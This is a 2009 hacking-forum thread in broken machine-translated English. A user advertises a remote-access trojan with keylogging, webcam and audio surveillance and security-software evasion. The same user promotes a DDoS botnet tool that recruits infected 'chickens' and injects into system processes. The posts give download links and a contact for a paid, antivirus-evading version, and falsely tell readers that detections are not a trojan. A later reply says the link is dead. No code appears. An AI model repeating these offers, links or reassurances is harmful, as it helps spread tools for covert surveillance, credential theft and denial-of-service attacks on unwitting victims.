finlay Posted November 26, 2009 Report Posted November 26, 2009 MS-DRT Trojan RATThe new concept of remote control software architecture, including domestic and international, some excellent use of architectural concepts. Entirely through the firewall and a variety of security software. And support for reverse connections, do not need to know the server's IP address of the remote management that can be used to achieve a variety of network environments. Without a back door server program, the algorithm in all the world's leading encrypted data transmission, to ensure maximum security of the server computer. Convenience of a full-featured remote control allows you to fully enjoy the fun of document management. ?1? File Management ?2? screen monitors ?3? key logger ?4? System Management ?5? session management ?6? Video Surveillance ?7? voice monitoring ?8? EXE plug-in ?9? 3389 pairs of open - ?10? Agent Function ?11? port mapping ?12? perfect support for Unicode ?13? to add API Search Engine ?14? through LAN proxy ?15? export public network IP list ?16? cluster control Low-power monitoring capabilities, allows you to ease operation Software with the screen monitor and camera monitoring capabilities, the use of this feature to the computer's configuration requirements is not high. Network transmission are high compression ratio of compression algorithms. Makes the network data packet transmission optimization to further improve overall performance and controllable. The control client will automatically clean up the memory, will take up memory space without the need for time to release and clear, so that program memoryDanisHDownloadMS-DRT Trojan-?? HOME Quote
finlay Posted November 26, 2009 Author Report Posted November 26, 2009 MS_Zombie Attack DDOS Introduction:n this is a Denial of Service DDOS stress testing software MSN_Zombie attack DDOS)etwork traffic control and system control technology costs, speed, do not plug, hidden, and powerful attacks, such as outstanding performance characteristics, can fully exploit the weaknesses of the target audience, with the DDOS-DDOS DDOS Firewall (introduced later) to be protective. The protection of corporate Web site or host security. Strong performance of the attack Support for custom packet TCP / UDP attack to attack in support of conventional host, such as multiple TCP connections / UDP floods at / ICMP / IGMP / SYN, etc. to support the Web site attacks, such as HTTP and more connected / HTTP download / FTP multi-connection / FTP download / CC attacks in support of win98/2k/xp/xp-sp2/vista system. Automatic on-line chickens A variety of ways to support the on-line mechanism for the broilers, such as Dynamic Domain Name / URL steering / FTP upload documents IP / fixed IP and so on, through a simple configuration can be automatically generated on the server. Server has powerful features automatic re-connection will be able to automatically search for hosts outside the network address, the automatic use of agents, to support the LAN control, never dropped. Hidden performance Encryptionthe protection of client services can be injected into any process, such as explorer, svchost, etc., NT system service can be generated automatically activated disguised. First-class attack speed Server-side part of the code directly from the completion of the compilation, in order to protect as much as possible at the same time functional compact, perfect attack speed by optimizing the speed and thread, to enhance the capacity of the best attackWelcome to the forum: ºÚ¾ÖºÚ¿ÍÂÛ̳-ºÚ¿Í¼¼Êõ:¼¼ÊõÌÖÂÛ,Éø͸,©¶´,ºÚ¿ÍÈí¼þ,ºÚ¿Í»ùµØ - Powered by Discuz! Sorry for my poor englishDownload Address:http://www.hackju.cn/msn.rarHello, can be customized professional business version of DDOS attack code written by an independent anti-virus software can not be killed but also a more formidable power ..... super cheap price of more powerful than others are discount software cheap attacks. Contact my MSN: hackxf@live.cn Thank you!MS-DDOS attack latest version of an increase of remote file management. Video surveillance. Screen monitor. Advanced features such as remote shell ... The intensity of attacks is a free version of the 3-fold, and supports 16 kinds of super-network attacksby Details please visit: http://www.hackju.cn/msn.htmAs a result of the use of too many people, it has been their anti-virus software as Trojan horse killing, So this is normal, not the back door or Trojan horse program, please rest assured that use. Quote
ActionBoy Posted November 30, 2009 Report Posted November 30, 2009 2 posturi ... iar link-ul nu merge . Quote